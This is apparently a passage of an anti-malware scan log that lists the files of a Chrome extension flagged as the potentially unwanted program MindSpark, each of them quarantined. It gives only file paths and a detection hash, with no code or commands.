    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather\css\weatherButton.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather\js\weather.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\background\ApiBasedWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\background\widget-api-impl.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window\hiddenWidgetWindow.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window\hiddenWidgetWindow.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window\hiddenWidgetWindowInit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window\widgetWindow.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\api\window\widgetWindow.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\background\updateSearch.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\background\updateSearchPromptBg.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\07_buttons2.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\08_buttons2.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\defaultSearchModal.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\defaultSearchModalInjector.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\defaultSearchModalInjector.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\tvf_btn_ok.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\tvf_btn_ok2.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\tvf_restart_alert_icon.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\tvf_restart_icon.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\defaultSearch\foreground\updateSearchPromptFg.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\background\MovieReviewsWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\css\movieReviews.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\html\movieReviews.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\moviereviews\js\movieReviews.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\background\RadioWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\css\toolbar-item.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\foreground\button.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\radioWrapper\radioWrapper.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\radio\radioWrapper\radioWrapper.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\background\searchBox.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestions.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\search\html\searchSuggestionsInit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\css\supertab.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\html\supertab.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\newtabfork.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\reporting.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\srchsugg.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\supertab.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\unifiedLogging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\components\supertab\js\__utm.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\arrowSprite.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon128.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon16.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon19disabled.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon19on.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\icon48.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\icons\tb_icon_search_disappearing_ask.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754507.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754510.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754534.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754535.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754536.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754537.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\223754551.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\down_arrow.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\IDR_PRODUCT_LOGO_16.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\IDR_WEBSTORE_ICON.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\magnifying_glass.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\RadioPlayerSprite.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\search_button.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\tvf_icon_guide.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\tvf_logo.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\images\wrench.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\chromeUtils.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exeManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exeManagerNMD.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\exePackageManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\focusManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\globalBlacklistManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\messaging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\mutation_summary-min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\mutation_summary.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\nativeMessagingDispatcher.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\newTabInfo.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\newTabInitialize.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\options.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\readLocalStorage.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\reservespacefortoolbar.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\reservespaceifenabled.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\scriptInjector.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\searchContext.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\settingsOverrides.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\toolbarCookieParser.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\toolbarPreinit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\underscore-1.3.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\URILoaderContentScript.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\webTooltabAPI.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\Widget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetContentScriptInjectee.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetFactory.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\js\widgetWindowManager.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\cache.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\ce.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\debug.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\ss.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\jquery-1.7.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\jquery-1.9.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\native\libs\underscore-1.5.2.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\activePing.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\buttonLogger.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\competitorDnsList.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\console.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\FFPreferencesPersister.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\httpTransport.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\HttpURL.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\internationalSearch.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\LocalStoragePersister.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobal.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\shared\MindsparkGlobal.unitTest.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
